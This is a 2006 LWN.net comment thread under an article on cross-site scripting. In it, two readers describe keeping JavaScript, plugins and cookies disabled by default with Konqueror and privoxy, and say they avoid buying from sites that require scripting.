User: Password:
|
|
Subscribe / Log in / New account

XSS is for real

XSS is for real

Posted Apr 20, 2006 16:36 UTC (Thu) by Duncan (guest, #6647)
In reply to: XSS is for real by b7j0c
Parent article: Cross-site scripting attacks

Indeed, XSS is a very real security worry.

I agree with the no-script thing. Turning off Javascript "drastic", as
the article states? I don't /think/ so! Rather, it's been the default
here for a good eight years or more. Scripting (and back on MSWormOS,
ActiveHex, and on Linux, plugins) and cookies are always off by default,
only turned on after I find I need them and ask myself what trust level I
have for the site, and whether my need for what the site offers justifies
the necessary hassle. I can state for a fact that a site's poor choices
have not only redirected my viewing, but thousands of dollars worth of
purchases, over the years. If they aren't security conscious enough to
realize that some users visiting their site won't have certain things
enabled by default, and have the site designed so at least information
about a product can be gathered without /too/ much jumping thru hoops to
turn stuff back on, then they obviously aren't concerned enough about
security to be worth my purchasing consideration, whether it's a site I'm
shopping right then with card in hand, or a manufacturer's site I'm
looking at for product info. There are other sites out there plenty
willing to let me be their customer, without the hassle.

FWIW, tho, not FireFox here, but Konqueror, with its per-site scripting
and cookie permissions, and privoxy, filtering the worst stuff and setting
all cookies to session-only by default, before Konqueror even sees it.

Duncan


(Log in to post comments)

XSS is for real

Posted Apr 23, 2006 15:42 UTC (Sun) by anton (subscriber, #25547) [Link]

>Turning off Javascript "drastic", as the article states? I don't
>/think/ so! Rather, it's been the default here for a good eight years
>or more.

On my accounts, I always turn off JavaScript (and a bunch of other
stuff), and *never* turn it on. And as for you, that certainly
affects what I buy.


Copyright © 2017, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds